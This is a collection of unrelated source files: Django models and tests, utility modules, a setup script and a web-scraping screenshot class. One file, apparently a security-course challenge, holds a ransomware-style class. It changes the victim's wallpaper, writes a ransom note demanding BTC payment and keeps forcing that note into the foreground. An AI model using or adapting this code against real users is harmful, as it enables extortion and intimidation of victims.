sb_1_sixth_B = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True)
sb_2_sixth_A = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True)
sb_2_sixth_B = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True)
sb_3_sixth_A = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True)
sb_3_sixth_B = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True)
sb_4_sixth_A = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True)
sb_4_sixth_B = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True)
sb_5_sixth_A = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True)
sb_5_sixth_B = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True)
sb_6_sixth_A = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True)
sb_6_sixth_B = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True)
sb_7_sixth_A = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True)
sb_7_sixth_B = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True)
sb_color_A = models.CharField(max_length=16, choices=COLORS, blank=True)
sb_color_B = models.CharField(max_length=16, choices=COLORS, blank=True)
def save(self, *args, **kwargs):
if not self.sb_color_A:
self.sb_color_A = self.team_A.color
if not self.sb_color_B:
self.sb_color_B = self.team_B.color
super(Match, self).save(*args, **kwargs)
def __str__(self):
ptA = str(self.points_A) if self.points_A else ''
ptB = str(self.points_B) if self.points_B else ''
return str(self.team_A) + ' ' + ptA + ' - ' + ptB + ' ' + str(self.team_B)
class Score(models.Model): # Punteggio
team = models.ForeignKey(Team, on_delete=models.CASCADE, related_name='scores')
group = models.ForeignKey(Group, on_delete=models.CASCADE, null=True, related_name='scores')
score = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True, default=0)
games_played = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True, default=0)
wins = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True, default=0)
losses = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True, default=0)
points_made = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True, default=0)
points_conceded = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True, default=0)
goals_made = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True, default=0)
goals_conceded = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True, default=0)
def __str__(self):
return str(self.group) + ': ' + str(self.team) + ' -> ' + str(self.score)
class Court(models.Model): # Campo
tournament = models.ForeignKey(Tournament, on_delete=models.CASCADE, null=True, related_name='courts')
name = models.CharField(max_length=16, blank=True)
importance = models.IntegerField(validators=[MinValueValidator(0)], blank=True, default=0)
def __str__(self):
return self.name
class Day(models.Model):
tournament = models.ForeignKey(Tournament, on_delete=models.CASCADE, null=True, related_name='days')
name = models.CharField(max_length=16)
def __str__(self):
return self.name
class Time(models.Model):
day = models.ForeignKey(Day, on_delete=models.CASCADE, null=True, related_name='times')
time = models.CharField(max_length=16, blank=True)
event = models.CharField(max_length=32, blank=True) # se non ci sono partite
precedent_time = models.OneToOneField('self', on_delete=models.SET_NULL, blank=True, null=True, related_name='next_time')
initial = models.BooleanField(default=False)
def __str__(self):
return self.time
| 2.296875 | 2 |
tests/test_functions.py | rtidatascience/django-postgres-power | 16 | 12767407 | <reponame>rtidatascience/django-postgres-power
from django.test import TestCase
from datetime import datetime
from postgres_stats import DateTrunc, Extract
from .models import Checkin
class TestFunctions(TestCase):
def test_date_trunc(self):
_checkin = Checkin.objects.create(logged_at='2015-11-01 11:14:01')
checkin = Checkin.objects. \
annotate(day=DateTrunc('logged_at', 'day'),
hour=DateTrunc('logged_at', 'hour')). \
get(pk=_checkin.pk)
assert checkin.day == datetime(2015, 11, 1, 0, 0, 0)
assert checkin.hour == datetime(2015, 11, 1, 11, 0, 0)
def test_extract(self):
_checkin = Checkin.objects.create(logged_at='2015-11-03 11:45:02')
checkin = Checkin.objects. \
annotate(day=Extract('logged_at', 'day'),
hour=Extract('logged_at', 'second'),
quarter=Extract('logged_at', 'quarter')). \
get(pk=_checkin.pk)
assert checkin.day == 3
assert checkin.hour == 2
assert checkin.quarter == 4
| 2.40625 | 2 |
suvec/vk_api_impl/session/records_managing/records.py | ProtsenkoAI/skady-user-vectorizer | 1 | 12767408 | <reponame>ProtsenkoAI/skady-user-vectorizer
import time
from typing import Optional, List
from abc import abstractmethod, ABC
from .session_types import Proxy, Credentials
from .consts import ResourceStatus, RESOURCE_OK_STATUS
class Record(ABC):
def __init__(self, obj_id: int, status: ResourceStatus = RESOURCE_OK_STATUS,
status_change_time: Optional[int] = None):
if status_change_time is None:
status_change_time = time.time()
self.obj_id = obj_id
self._status = status
self.status_change_time = status_change_time
@property
def status(self):
return self._status
@status.setter
def status(self, status):
self.status_change_time = time.time()
self._status = status
@property
def time_since_status_change(self):
return time.time() - self.status_change_time
def is_in(self, records: List):
for record in records:
if self.check_same(record):
return True
return False
def __repr__(self):
return f"record_id: {self.obj_id}, status: {self.status}"
@abstractmethod
def check_same(self, record):
"""Check that both records represent same resource (for example, same proxy address)"""
...
class ProxyRecord(Record):
def __init__(self, *args, proxy: Proxy, **kwargs):
self.proxy = proxy
super().__init__(*args, **kwargs)
def check_same(self, record):
return self.proxy == record.proxy
def __repr__(self):
return f"{self.proxy}, {super().__repr__()}"
class CredsRecord(Record):
def __init__(self, *args, creds: Credentials, **kwargs):
self.creds = creds
super().__init__(*args, **kwargs)
def check_same(self, record):
return self.creds == record.creds
def __repr__(self):
return f"{self.creds}, {super().__repr__()}"
| 2.34375 | 2 |
python_07_function/music.py | lexiaoyuan/PythonCrashCourse | 0 | 12767409 | <reponame>lexiaoyuan/PythonCrashCourse
def make_album(singer, album, numbers=''):
albums = {'singer': singer, 'album': album}
if numbers:
albums['numbers'] = numbers
return albums
print(make_album('张靓颖', '终于等到你'))
print(make_album('邓丽君', '我只在乎你', 20))
print(make_album('汪小敏', '笑看风云'))
while True:
singer = input("请输入歌手:")
if not singer:
break
album = input("请输入专辑:")
if not album:
break
print(make_album(singer, album))
| 3.859375 | 4 |
setup.py | akrk1986/re-wx | 0 | 12767410 | <gh_stars>0
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="re-wx",
version="0.0.1",
author="<NAME>",
author_email="<EMAIL>",
description="A library for building modern declarative desktop applications in WX",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/chriskiehl/re-wx",
include_package_data=True,
data_files=[('rewx', ['rewx/icon.png'])],
install_requires=['wxpython>=4.1.0'],
packages=setuptools.find_packages(),
classifiers=[
"Development Status :: 2 - Pre-Alpha",
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: Microsoft :: Windows",
"Operating System :: MacOS",
"Operating System :: POSIX :: Linux",
"Intended Audience :: End Users/Desktop",
"Topic :: Software Development :: User Interfaces"
],
python_requires='>=3.6',
) | 1.492188 | 1 |
ops_challenge/ops_challenge05/classes/malware.py | jinwoov/Ops401 | 0 | 12767411 | <filename>ops_challenge/ops_challenge05/classes/malware.py<gh_stars>0
import os, ctypes, urllib.request, datetime, subprocess, time, win32gui
from .helper_method import *
class Malware:
def __init__(self):
self.user_name = os.path.expanduser("~")
self.ab_path = f"{self.user_name}/Desktop/"
def change_desktop_wallpaper(self):
image_url = "https://pm1.narvii.com/7277/cad40d74ff7b2a772ad6340c3d6d28eb2ce2b7d9r1-1080-848v2_hq.jpg"
passage = f'{self.ab_path}malware.jpg'
urllib.request.urlretrieve(image_url, passage)
set_desktop_wallpaper = 20
ctypes.windll.user32.SystemParametersInfoW(set_desktop_wallpaper, 0, passage, 0)
animated_marker()
def you_sure(self):
answer = input("You sure you want to continue? (y/n)")
if(answer.lower() == "y"):
return True
def ransom_note(self):
note_path = f'{self.ab_path}/RANSOM_NOTE.txt'
date = datetime.date.today().strftime('%d-%B-%Y')
with open(note_path, 'w') as f:
f.write(f'''
{date}
The harddisks of your computer have been encrypted with an Military grade encryption algorithm.
There is no way to restore your data without a special key.
Only we can decrypt your files!
To purchase your key and restore your data, please follow these three easy steps:
1. Email the file called EMAIL_ME.txt at {self.user_name}/Desktop/EMAIL_ME.txt to <EMAIL>
2. You will receive your personal BTC address for payment.
Once payment has been completed, send another email to <EMAIL> stating "PAID".
We will check to see if payment has been paid.
3. You will receive a text file with your KEY that will unlock all your files.
IMPORTANT: To decrypt your files, place text file on desktop and wait. Shortly after it will begin to decrypt all files.
WARNING:
Do NOT attempt to decrypt your files with any software as it is obsolete and will not work, and may cost you more to unlock your files.
Do NOT change file names, mess with the files, or run deccryption software as it will cost you more to unlock your files-
-and there is a high chance you will lose your files forever.
Do NOT send "PAID" button without paying, price WILL go up for disobedience.
Do NOT think that we wont delete your files altogether and throw away the key if you refuse to pay. WE WILL.
''')
def show_ransom_note(self):
note_path = f'{self.ab_path}/RANSOM_NOTE.txt'
# Open the ransom note
ransom = subprocess.Popen(['notepad.exe', note_path])
count = 0 # Debugging/Testing
while True:
time.sleep(0.1)
top_window = win32gui.GetWindowText(win32gui.GetForegroundWindow())
if top_window == 'RANSOM_NOTE - Notepad':
print('Ransom note is the top window - do nothing') # Debugging/Testing
pass
else:
print('Ransom note is not the top window - kill/create process again') # Debugging/Testing
# Kill ransom note so we can open it agian and make sure ransom note is in ForeGround (top of all windows)
time.sleep(0.1)
ransom.kill()
# Open the ransom note
time.sleep(0.1)
ransom = subprocess.Popen(['notepad.exe', note_path])
# sleep for 10 seconds
time.sleep(10)
count +=1
if count == 5:
break | 3.03125 | 3 |
vector_2d/__init__.py | betados/vector_2D | 3 | 12767412 | <reponame>betados/vector_2D<filename>vector_2d/__init__.py
from vector_2d.vector import *
from vector_2d.vectorPolar import *
__all__ = ["vector", "vectorPolar", "VectorPolar", "Vector", "round_vector", "angle", "distance_point_line",
"distance_point_segment"]
| 1.65625 | 2 |
restful_mys/controller/auth.py | YnkDK/restful-mys | 0 | 12767413 | <filename>restful_mys/controller/auth.py
import time
from flask.ext.restful import Resource, reqparse, abort
from flask import jsonify
from ..model.auth import Auth as Model
from restful_mys.controller.secure_resource import SecureResource
class Auth(Resource):
def __init__(self):
"""
Sets up request parser and model for authentication
"""
super(Auth, self).__init__()
self.request_parser = reqparse.RequestParser()
self.model = Model()
def get(self):
"""
Checks if a token is valid.
:return: OK if token was valid, Unauthorized if invalid or Request Timeout if expired
"""
sr = SecureResource(self.CONFIG['SECRET_KEY'])
return sr.jsonify({'message': 'OK'})
def post(self):
"""
A typical login scenario. If login/password combination is correct, a token is generated which would be a key
for all SecureResources. If login/password combination is invalid then 'Unauthorized' is returned.
:return:
"""
self.request_parser.add_argument(
name='login',
required=True,
type=str,
help="Needs argument: 'login' - the user login"
)
self.request_parser.add_argument(
name='password',
required=True,
type=str,
help="Needs argument: 'password' - the <PASSWORD>"
)
self.request_parser.add_argument(
name='expire',
required=False,
default=600,
type=int,
help="Argument: 'expire' - the time (seconds) the issued token should be valid. Default to 600 seconds."
)
args = self.request_parser.parse_args()
# Check login and issue token
login_id, token = self.model.validate_login(args['login'], args['password'], args['expire'])
if login_id is None:
# Unauthorized access
abort(401)
return jsonify({
'message': 'OK',
'token': token,
'expires_at': int(time.time() + args['expire'])
}) | 3.1875 | 3 |
03/spiral_memory.py | redfast00/advent_of_code_2017 | 0 | 12767414 | <gh_stars>0
def get_level(cell):
i = 0
while cell > (2*i+1)**2:
i += 1
return i
def find_coord(cell):
level = get_level(cell)
x = level
y = -level
current = (2*level+1)**2
while x != -level:
if current == cell:
return (x, y)
x-=1
current -= 1
while y != level:
if current == cell:
return (x, y)
y+=1
current -= 1
while x != level:
if current == cell:
return (x, y)
x+=1
current -= 1
while y != -level:
if current == cell:
return (x, y)
y-=1
current -= 1
return None
print(find_coord(347991))
| 3.453125 | 3 |
runoob/basic_tutorial/for.py | zeroonegit/python | 1 | 12767415 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Filename: for.py
edibles = ['ham', 'spam', 'eggs', 'nuts']
for food in edibles:
if food == 'spam':
print('No more spam please!')
break
print('Great, delicious ' + food)
else:
print('I am so glad: No spam!')
print('Finally, I finished stuffing myself')
| 3.609375 | 4 |
abnormal/Address.py | 89berner/abnormal | 4 | 12767416 | import logging
import json
import re
import time
import os
import traceback
import sys
import Utils
import cv2
import hashlib
from BeautifulSoup import BeautifulSoup
from selenium.webdriver.common.by import By
from selenium import webdriver
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
#Reduce logging for selenium
from selenium.webdriver.remote.remote_connection import LOGGER
LOGGER.setLevel(logging.WARNING)
class Address:
def __init__(self, url, observer, options):
self.url = url
self.observer = observer
self.options = options
self.vars = {} #Map of js variables and their values
self.links = {} #Map of the links and the amount of times they appear
self.image_filename = "" #Filename
self.image_hash = "" #Hash of the image
self.driver = self.get_driver()
def get_url(self,url):
proxies = {'http' : "http://%s" % self.observer.ip, 'https': "https://%s" % self.observer.ip}
if self.options.no_proxy:
proxies = {}
try:
r = self.observer.session.get(url, proxies=proxies, verify=False, timeout=5)
self.content = r.content
except Exception as e:
return 0
#Save source
self.save_source()
return 1
def save_source(self):
filename = "tmp/source/%s" % Utils.as_filename("%s-%s.txt" % (self.url, self.observer.ip))
f = open(filename, 'w')
f.write(self.content)
def set_data(self):
vars = self.parse_scripts()
self.get_child("",vars,0)
self.parse_links()
def parse_scripts(self):
soup = BeautifulSoup(self.content)
all_data = []
res_dict = {}
logging.debug("Parsing script for %s" % self.url)
for script_part in soup.findAll('script'):
try:
json_data = re.findall('({.*})', script_part.string)
for j_data in json_data:
try:
data = json.loads(j_data)
if len(data):
all_data.append(data)
except:
pass
except:
pass
for data in all_data:
res_dict.update(data)
return res_dict
## Recursively populate self.vars map for js variables
def get_child(self,name,child,place):
if place == 5:
return
if type(child) is dict:
for leaf in child:
if name != "":
use_name = name + "-" + str(leaf)
else:
use_name = str(leaf)
self.get_child(use_name,child[leaf],place + 1)
else:
self.vars[name] = child
def parse_links(self):
soup = BeautifulSoup(self.content)
for link in soup.findAll('a'):
if 'href' in link:
link_name = link['href'].strip().replace(" ","")
if not link_name in self.links:
self.links[link_name] = 0
self.links[link_name] += 1
def get_driver(self):
dcap = dict(DesiredCapabilities.PHANTOMJS)
dcap["phantomjs.page.settings.userAgent"] = ( self.observer.ua )
service_args = ['--ignore-ssl-errors=true', '--ssl-protocol=any']
if not self.options.no_proxy:
service_args.append("--proxy=%s" % self.observer.ip)
driver = webdriver.PhantomJS(service_log_path=os.path.devnull, desired_capabilities=dcap, service_args=service_args)
driver.set_window_size(1280,800)
driver.set_page_load_timeout(20)
driver.set_script_timeout(30)
return driver
def take_screenshot(self):
driver = self.driver
driver.get(self.url)
time.sleep(10)
try:
filename = "tmp/screen/%s" % Utils.as_filename("%s-%s.png" % (self.url,self.observer.ip))
driver.save_screenshot(filename)
self.image_filename = filename
image = self.read_image()
self.image_hash = hashlib.md5(image).hexdigest()
logging.debug("Saved %s" % filename)
except Exception as e:
print "Error taking screenshot: %s" % (traceback.format_exception(*sys.exc_info()))
driver.close()
driver.quit()
return 0
def perform_action(self,action):
try:
driver = self.driver
driver.get(self.url)
time.sleep(10)
try:
element = driver.find_element_by_id('new_button')
logging.debug("Element chosen is: %s" % element)
element.click()
logging.debug("Clicked on element %s" % element)
except Exception as e:
print "Error taking action %s: %s" % (action,traceback.format_exception(*sys.exc_info()))
driver.close()
driver.quit()
return 0
except:
print "Error with observer %s" % self.observer.ip
def read_image(self):
image = cv2.imread(self.image_filename)
if image is None:
print "Error getting image of url %s for file %s of observer %s" % (url,filename, self.ip)
return image
| 2.515625 | 3 |
aoc2020/day_02/part_2.py | en0/aoc2020 | 0 | 12767417 | <reponame>en0/aoc2020
from .part_1 import Solution as Part1Solution
class Solution(Part1Solution):
expected = 1
@classmethod
def check_pw(cls, line: str):
policy, pw = line.split(': ', 2)
pos, letter = policy.split(' ')
pos1, pos2 = pos.split('-')
return sum([
pw[int(pos1)-1] == letter,
pw[int(pos2)-1] == letter,
]) == 1
| 3.28125 | 3 |
MainWeb.py | leonevo/euao | 2 | 12767418 | #!/usr/bin/env python
#-*- coding: utf-8 -*-
#
# Copyright 2012 <EMAIL>
#
import tornado.httpserver
import tornado.ioloop
from tornadows import soaphandler
from tornadows import webservices
from tornadows import xmltypes
from tornadows.soaphandler import webservice
from time import ctime,sleep
import CommonDefinition
#process web service class import
import os
import sys
cur_dir=os.path.dirname(os.path.abspath(__file__))
AIX_dir=cur_dir+CommonDefinition.path_dir_sep+'AIX'
sys.path.append(AIX_dir)
EMC_dir=cur_dir+CommonDefinition.path_dir_sep+'EMC'
sys.path.append(EMC_dir)
VMware_dir=cur_dir+CommonDefinition.path_dir_sep+'VMware'
sys.path.append(VMware_dir)
HP_dir=cur_dir+CommonDefinition.path_dir_sep+'HP'
sys.path.append(HP_dir)
from ControlAIX import ControlAIX
from ControlEMC import ControlEMC
from ControlVMware import ControlVMware
from ControlHP import ControlHP
if __name__ == '__main__':
service=[('ControlAIX',ControlAIX),
('ControlEMC',ControlEMC),
('ControlVMware',ControlVMware),
('ControlHP',ControlHP)]
app=webservices.WebService(service)
ws=tornado.httpserver.HTTPServer(app)
port=CommonDefinition.Tornado_port
ws.listen(port)
tornado.ioloop.IOLoop.instance().start() | 1.960938 | 2 |
server/opendp_apps/analysis/testing/test_dp_count_spec.py | mikephelan/opendp-ux | 0 | 12767419 | import json
from os.path import abspath, dirname, isfile, join
CURRENT_DIR = dirname(abspath(__file__))
TEST_DATA_DIR = join(dirname(dirname(dirname(CURRENT_DIR))), 'test_data')
from opendp_apps.analysis.testing.base_stat_spec_test import StatSpecTestCase
from opendp_apps.analysis.tools.dp_count_spec import DPCountSpec
from opendp_apps.model_helpers.msg_util import msgt
from opendp_apps.analysis import static_vals as astatic
from opendp_apps.profiler import static_vals as pstatic
from opendp_apps.utils.extra_validators import *
class DPCountStatSpecTest(StatSpecTestCase):
fixtures = ['test_dataset_data_001.json', ]
def test_05_valid_noise_mechanism(self):
"""Check for the correct noise_mechanism"""
dp_count = DPCountSpec({})
self.assertEqual(dp_count.noise_mechanism, astatic.NOISE_GEOMETRIC_MECHANISM)
def test_10_count_valid_spec(self):
"""(10) Run DP Count valid spec, float column"""
msgt(self.test_10_count_valid_spec.__doc__)
spec_props = {'variable': 'EyeHeight',
'col_index': 19,
'statistic': astatic.DP_COUNT,
'dataset_size': 183,
'epsilon': 1.0,
'delta': 0.0,
'cl': astatic.CL_99,
'missing_values_handling': astatic.MISSING_VAL_INSERT_FIXED,
'fixed_value': '182',
'variable_info': {'min': -8,
'max': 5,
'type': 'Float', },
}
dp_count = DPCountSpec(spec_props)
dp_count.is_chain_valid()
#if dp_count.has_error():
# print(dp_count.get_err_msgs())
# ------------------------------------------------------
# Run the actual count
# ------------------------------------------------------
# Column indexes - We know this data has 20 columns
col_indexes = [idx for idx in range(0, 20)]
# File object
#
eye_fatigue_filepath = join(TEST_DATA_DIR, 'Fatigue_data.tab')
# print('eye_fatigue_filepath', eye_fatigue_filepath)
self.assertTrue(isfile(eye_fatigue_filepath))
file_obj = open(eye_fatigue_filepath, 'r')
# Call run_chain
#
dp_count.run_chain(col_indexes, file_obj, sep_char="\t")
file_obj.close()
self.assertFalse(dp_count.has_error())
# val from local machine: 4.6051702036798
#self.assertTrue(dp_count.accuracy_val > 4.5)
#self.assertTrue(dp_count.accuracy_val < 4.7)
# Actual count 184
self.assertTrue(dp_count.value > 170) # should be well within range
def test_20_count_valid_spec(self):
"""(20) Run DP Count valid spec, integer column"""
msgt(self.test_20_count_valid_spec.__doc__)
spec_props = {'variable': 'age',
'col_index': 1,
'statistic': astatic.DP_COUNT,
'dataset_size': 10_000,
'epsilon': 1.0,
'delta': 0.0,
'cl': astatic.CL_95,
'missing_values_handling': astatic.MISSING_VAL_INSERT_FIXED,
'fixed_value': '44',
'variable_info': {'min': 18,
'max': 95,
'type': pstatic.VAR_TYPE_INTEGER},
}
dp_count = DPCountSpec(spec_props)
self.assertTrue(dp_count.is_chain_valid())
# if dp_count.has_error():
# print(dp_count.get_err_msgs())
self.assertFalse(dp_count.has_error())
# ------------------------------------------------------
# Run the actual count
# ------------------------------------------------------
# Column indexes - We know this data has 11 columns
col_indexes = [idx for idx in range(0, 11)]
# File object
#
pums_extract_10_000 = join(TEST_DATA_DIR, 'PUMS5extract10000.csv')
# print('eye_fatigue_filepath', eye_fatigue_filepath)
self.assertTrue(isfile(pums_extract_10_000))
file_obj = open(pums_extract_10_000, 'r')
# Call run_chain
#
dp_count.run_chain(col_indexes, file_obj, sep_char=",")
file_obj.close()
self.assertFalse(dp_count.has_error())
self.show_release_result(dp_count.get_release_dict())
# val from local machine: 2.9957322850627124
self.assertTrue(dp_count.accuracy_val > 2.995)
self.assertTrue(dp_count.accuracy_val < 2.996)
# Actual count 10_000
self.assertTrue(dp_count.value > 9_980) # should be well within range
final_dict = dp_count.get_release_dict()
self.assertIn('description', final_dict)
self.assertIn('text', final_dict['description'])
self.assertIn('html', final_dict['description'])
def test_30_count_valid_another_spec(self):
"""(30) Run DP Count on another valid spec"""
msgt(self.test_30_count_valid_another_spec.__doc__)
spec_props = {'variable': 'TypingSpeed',
'col_index': 5,
'statistic': astatic.DP_COUNT,
'dataset_size': 183,
'epsilon': 1.0,
'delta': 0.0,
'cl': astatic.CL_99,
'missing_values_handling': astatic.MISSING_VAL_INSERT_FIXED,
'fixed_value': '62',
'variable_info': {'min': 1,
'max': 61,
'type': pstatic.VAR_TYPE_FLOAT},
}
dp_count = DPCountSpec(spec_props)
dp_count.is_chain_valid()
# if dp_count.has_error():
# print(dp_count.get_err_msgs())
# ------------------------------------------------------
# Run the actual count
# ------------------------------------------------------
# Column indexes - We know this data has 20 columns
col_indexes = [idx for idx in range(0, 20)]
# File object
#
eye_fatigue_filepath = join(TEST_DATA_DIR, 'Fatigue_data.tab')
# print('eye_fatigue_filepath', eye_fatigue_filepath)
self.assertTrue(isfile(eye_fatigue_filepath))
file_obj = open(eye_fatigue_filepath, 'r')
# Call run_chain
#
dp_count.run_chain(col_indexes, file_obj, sep_char="\t")
file_obj.close()
self.assertFalse(dp_count.has_error())
self.show_release_result(dp_count.get_release_dict())
# (test has wide accuracy latitude)
self.assertTrue(dp_count.accuracy_val > 4.4)
self.assertTrue(dp_count.accuracy_val < 4.8)
# Actual count 184
self.assertTrue(dp_count.value > 170) # should be well within range
final_dict = dp_count.get_release_dict()
self.assertIn('description', final_dict)
self.assertIn('text', final_dict['description'])
self.assertIn('html', final_dict['description'])
def test_40_count_valid_str_spec(self):
"""(40) Run DP Count string"""
msgt(self.test_40_count_valid_str_spec.__doc__)
spec_props = {'variable': 'Subject',
'col_index': 0,
'statistic': astatic.DP_COUNT,
'dataset_size': 183,
'epsilon': 1.0,
'delta': 0.0,
'cl': astatic.CL_95,
'missing_values_handling': astatic.MISSING_VAL_INSERT_FIXED,
'fixed_value': 'ac',
'variable_info': {'type': pstatic.VAR_TYPE_CATEGORICAL},
}
dp_count = DPCountSpec(spec_props)
dp_count.is_chain_valid()
self.assertTrue(dp_count.is_chain_valid())
# if dp_count.has_error():
# print(dp_count.get_err_msgs())
self.assertFalse(dp_count.has_error())
# ------------------------------------------------------
# Run the actual count
# ------------------------------------------------------
# Column indexes - We know this data has 20 columns
col_indexes = [idx for idx in range(0, 20)]
# File object
#
eye_fatigue_filepath = join(TEST_DATA_DIR, 'Fatigue_data.tab')
# print('eye_fatigue_filepath', eye_fatigue_filepath)
self.assertTrue(isfile(eye_fatigue_filepath))
file_obj = open(eye_fatigue_filepath, 'r')
# Call run_chain
#
dp_count.run_chain(col_indexes, file_obj, sep_char="\t")
file_obj.close()
self.assertFalse(dp_count.has_error())
# val from local machine: 4.6051702036798
# self.assertTrue(dp_count.accuracy_val > 4.5)
# self.assertTrue(dp_count.accuracy_val < 4.7)
# Actual count 184
self.assertTrue(dp_count.value > 170) # should be well within range
self.show_release_result(dp_count.get_release_dict())
# (test has wide accuracy latitude)
self.assertTrue(dp_count.accuracy_val > 2)
self.assertTrue(dp_count.accuracy_val < 4)
final_dict = dp_count.get_release_dict()
self.assertIn('description', final_dict)
self.assertIn('text', final_dict['description'])
self.assertIn('html', final_dict['description'])
def test_50_count_missing_vals_str(self):
"""(50) Run DP Count string"""
msgt(self.test_50_count_missing_vals_str.__doc__)
xspec_props = {'variable': 'gender',
'col_index': 4,
'statistic': astatic.DP_COUNT,
'dataset_size': 1_000,
'epsilon': 1.0,
'delta': 0.0,
'cl': astatic.CL_95,
'missing_values_handling': astatic.MISSING_VAL_INSERT_FIXED,
'fixed_value': 'Genderfluid',
'variable_info': {'type': pstatic.VAR_TYPE_CATEGORICAL},
}
# right from UI
spec_props = {'error': '', 'label': 'gender', 'locked': False,
'epsilon': 1.0, 'delta': 0.0, 'cl': 0.95,
'variable': 'gender', 'statistic': 'count',
'fixed_value': 'male', 'handle_as_fixed': True,
'missing_values_handling': 'insert_fixed', 'dataset_size': 1000,
'variable_info': {'name': 'gender', 'type': 'Categorical',
'label': 'gender', 'selected': True,
'categories': ['Genderfluid'], 'sort_order': 4}, 'col_index': 4}
dp_count = DPCountSpec(spec_props)
dp_count.is_chain_valid()
self.assertTrue(dp_count.is_chain_valid())
# if dp_count.has_error():
# print(dp_count.get_err_msgs())
# ------------------------------------------------------
# Run the actual count
# ------------------------------------------------------
# Column indexes - We know this data has 20 columns
col_indexes = [idx for idx in range(0, 28)]
# File object
#
bonabo_filepath = join(TEST_DATA_DIR, 'bonabo MOCK_DATA.csv')
# print('eye_fatigue_filepath', eye_fatigue_filepath)
self.assertTrue(isfile(bonabo_filepath))
file_obj = open(bonabo_filepath, 'r')
# Call run_chain
#
dp_count.run_chain(col_indexes, file_obj, sep_char=",")
file_obj.close()
self.assertFalse(dp_count.has_error())
# val from local machine: 4.6051702036798
# self.assertTrue(dp_count.accuracy_val > 4.5)
# self.assertTrue(dp_count.accuracy_val < 4.7)
# Actual count 184
self.assertTrue(dp_count.value > 970) # should be well within range
def test_60_count_missing_vals_bool(self):
"""(60) Run DP Count bool"""
msgt(self.test_60_count_missing_vals_bool.__doc__)
spec_props = {'variable': 'Boolean2',
'col_index': 8,
'statistic': astatic.DP_COUNT,
'dataset_size': 1_000,
'epsilon': 1.0,
'delta': 0.0,
'cl': astatic.CL_95,
'missing_values_handling': astatic.MISSING_VAL_INSERT_FIXED,
'fixed_value': 'true',
'variable_info': {'type': pstatic.VAR_TYPE_BOOLEAN},
}
dp_count = DPCountSpec(spec_props)
dp_count.is_chain_valid()
self.assertTrue(dp_count.is_chain_valid())
# if dp_count.has_error():
# print(dp_count.get_err_msgs())
# ------------------------------------------------------
# Run the actual count
# ------------------------------------------------------
# Column indexes - We know this data has 20 columns
col_indexes = [idx for idx in range(0, 28)]
# File object
#
bonabo_filepath = join(TEST_DATA_DIR, 'bonabo MOCK_DATA.csv')
# print('eye_fatigue_filepath', eye_fatigue_filepath)
self.assertTrue(isfile(bonabo_filepath))
file_obj = open(bonabo_filepath, 'r')
# Call run_chain
#
dp_count.run_chain(col_indexes, file_obj, sep_char=",")
file_obj.close()
self.assertFalse(dp_count.has_error())
# val from local machine: 4.6051702036798
# self.assertTrue(dp_count.accuracy_val > 4.5)
# self.assertTrue(dp_count.accuracy_val < 4.7)
# Actual count 184
self.assertTrue(dp_count.value > 970) # should be well within range
def show_release_result(self, release_dict:{}):
"""print the result to the screen"""
print(json.dumps(release_dict, indent=4)) | 2.09375 | 2 |
tests/test_utils_paths.py | gva-jjoyce/gva_data | 0 | 12767420 | <filename>tests/test_utils_paths.py<gh_stars>0
"""
Tests for paths to ensure the split and join methods
of paths return the expected values for various
stimulus.
"""
import datetime
import sys
import os
sys.path.insert(1, os.path.join(sys.path[0], '..'))
from gva.utils import paths
try:
from rich import traceback
traceback.install()
except ImportError: # pragma: no cover
pass
def test_blob_paths_split_filename():
name, ext = paths.split_filename("one_extension.ext")
assert name == 'one_extension', f"{name} {ext}"
assert ext == '.ext', f"{name} {ext}"
name, ext = paths.split_filename("two_extension.ext.zip")
assert name == 'two_extension.ext', f"{name} {ext}"
assert ext == '.zip', f"{name} {ext}"
name, ext = paths.split_filename("double_dot..zip")
assert name == 'double_dot.', f"{name} {ext}"
assert ext == '.zip', f"{name} {ext}"
name, ext = paths.split_filename("no_ext")
assert name == 'no_ext', f"{name} {ext}"
assert ext == '', f"{name} {ext}"
name, ext = paths.split_filename(".all_ext")
assert name == '.all_ext', f"{name} {ext}"
assert ext == '', f"{name} {ext}"
name, ext = paths.split_filename(".dot_start.zip")
assert name == '.dot_start', f"{name} {ext}"
assert ext == '.zip', f"{name} {ext}"
name, ext = paths.split_filename("") # empty
assert len(name) == 0
assert len(ext) == 0
name, ext = paths.split_filename("with/path/file.ext")
assert name == 'with/path/file', f"{name} {ext}"
assert ext == '.ext', f"{name} {ext}"
name, ext = paths.split_filename("with/dot.in/path")
assert name == 'with/dot.in/path', f"{name} {ext}"
assert ext == '', f"{name} {ext}"
def test_blob_paths_get_paths():
bucket, path, name, ext = paths.get_parts("bucket/parent_folder/sub_folder/filename.ext")
assert bucket == 'bucket'
assert name == 'filename'
assert ext == '.ext'
assert path == 'parent_folder/sub_folder/'
def test_blob_paths_builder():
# without trailing /, the / should be added
template = '%datefolders/%Y/%date/'
path = paths.build_path(template, datetime.datetime(2000, 9, 19, 1, 36, 42, 365))
assert path == "year_2000/month_09/day_19/2000/2000-09-19/", path
# with trailing /, the / should be retained
template = '%datefolders/%Y/%date/'
path = paths.build_path(template, datetime.datetime(2000, 9, 19, 1, 36, 42, 365))
